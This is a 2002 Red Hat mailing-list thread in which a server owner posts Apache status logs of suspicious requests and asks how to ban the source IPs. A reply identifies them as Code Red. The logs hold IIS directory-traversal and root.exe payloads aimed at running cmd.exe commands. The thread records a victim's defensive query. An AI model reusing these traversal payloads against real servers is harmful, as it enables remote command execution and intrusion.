Code Red. -----Original Message----- From: [EMAIL PROTECTED] [mailto:redhat-list-admin@;redhat.com] On Behalf Of Daevid Vincent Sent: Friday, October 25, 2002 8:15 PM To: [EMAIL PROTECTED] Subject: Is this a hack attempt?
I run RH8.0 so this sure seems suspicious to me: 1-0 25065 0/508/508 _ 6.42 128 0 0.0 130.31 130.31 12.237.249.145 daevid.com GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 4-0 25068 0/519/519 _ 5.86 139 0 0.0 143.76 143.76 12.237.249.145 daevid.com GET /MSADC/root.exe?/c+dir HTTP/1.0 5-0 25069 0/518/518 _ 5.84 142 0 0.0 99.62 99.62 12.237.249.145 daevid.com GET /scripts/root.exe?/c+dir HTTP/1.0 6-0 25070 0/531/531 _ 6.44 114 0 0.0 129.48 129.48 12.237.249.145 daevid.com GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../.. 7-0 25071 0/525/525 _ 6.93 117 0 0.0 139.17 139.17 12.237.249.145 daevid.com GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd. 8-0 25214 0/503/503 _ 5.83 136 0 0.0 118.91 118.91 12.237.249.145 daevid.com GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 9-0 25774 0/271/271 _ 4.87 133 0 0.0 119.94 119.94 12.237.249.145 daevid.com GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 10-0 26526 0/457/457 _ 5.36 335 0 0.0 100.78 100.78 12.229.31.145 daevid.com GET /MSADC/root.exe?/c+dir HTTP/1.0 14-0 26531 0/334/334 _ 3.51 119 0 0.0 89.96 89.96 12.237.249.145 daevid.com GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd. And so now is there a way I can make a file of IP/domains that are banned from contacting my server (all ports)? -- redhat-list mailing list unsubscribe mailto:redhat-list-request@;redhat.com?subject=unsubscribe https://listman.redhat.com/mailman/listinfo/redhat-list -- redhat-list mailing list unsubscribe mailto:redhat-list-request@;redhat.com?subject=unsubscribe https://listman.redhat.com/mailman/listinfo/redhat-list
